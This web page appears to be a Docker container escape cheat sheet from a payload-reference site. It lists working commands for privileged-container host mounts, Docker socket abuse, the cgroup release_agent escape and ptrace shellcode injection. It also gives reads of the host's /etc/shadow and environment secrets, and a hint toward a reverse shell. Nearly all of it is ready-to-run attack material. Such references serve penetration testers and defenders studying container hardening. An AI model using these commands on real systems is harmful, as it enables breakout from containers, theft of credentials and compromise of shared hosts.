Docker Container Escape Cheat Sheet

Docker container escape techniques — privileged container abuse, Docker socket exploitation, cgroup release agent escape, and capability-based escapes. (21 payloads)

Detection: Are We in a Container?

(4)

ls /.dockerenv && echo "In Docker"

Docker flag file — present in all Docker containers

cat /proc/1/cgroup | grep -i docker

cgroup shows docker — confirms container environment

cat /proc/self/status | grep CapEff

Effective capabilities — high value indicates privileged container

capsh --print | grep cap_sys_admin

Check for CAP_SYS_ADMIN — enables most escape techniques

Privileged Container Escape

(4)

fdisk -l

List host disks — visible from inside privileged container

mkdir /mnt/host && mount /dev/sda1 /mnt/host

Mount host disk inside container

chroot /mnt/host /bin/bash

Chroot into host filesystem — full host access

cat /mnt/host/etc/shadow

Read host /etc/shadow after mounting host disk

Docker Socket Escape

(3)

ls -la /var/run/docker.sock

Check if Docker socket is mounted inside container

docker -H unix:///var/run/docker.sock run -v /:/mnt -it ubuntu chroot /mnt

Escape via Docker socket — mount host root and chroot

curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json

Docker API via socket — list all containers

Cgroup Release Agent Escape

(4)

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

Step 1: Mount cgroup v1 and create child cgroup — requires CAP_SYS_ADMINcgroup v1 required

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgrp/release_agent

Step 2: Set release_agent to writable path on host — runs on host when cgroup is empty

echo '#!/bin/sh' > /cmd && echo "id > $host_path/output" >> /cmd && chmod +x /cmd

Step 3: Write command to execute on host — e.g. reverse shell or copy /etc/shadow

sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs" && cat /output

Step 4: Trigger escape — move PID into child cgroup then exit; check output file on host

CAP_SYS_PTRACE Escape

(2)

cat /proc/self/status | grep CapEff

Verify CAP_SYS_PTRACE capability is present

python3 inject.py <host_pid>

Inject shellcode into host process via ptrace — achieves host code execution

Post-Escape Actions

(4)

crontab -l

Check host cron jobs for persistence opportunities

cat /proc/1/environ

Host environment variables — may contain secrets, tokens, credentials

ls /var/lib/docker/volumes/

Other container volumes — may expose data from other containers

docker ps -a

List all running and stopped containers on host

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

Cloud Infrastructure

Related Cheat Sheets

Linux Privilege Escalation Cheat Sheet Post-Exploitation Cheat Sheet Kubernetes Security Cheat Sheet

$loading...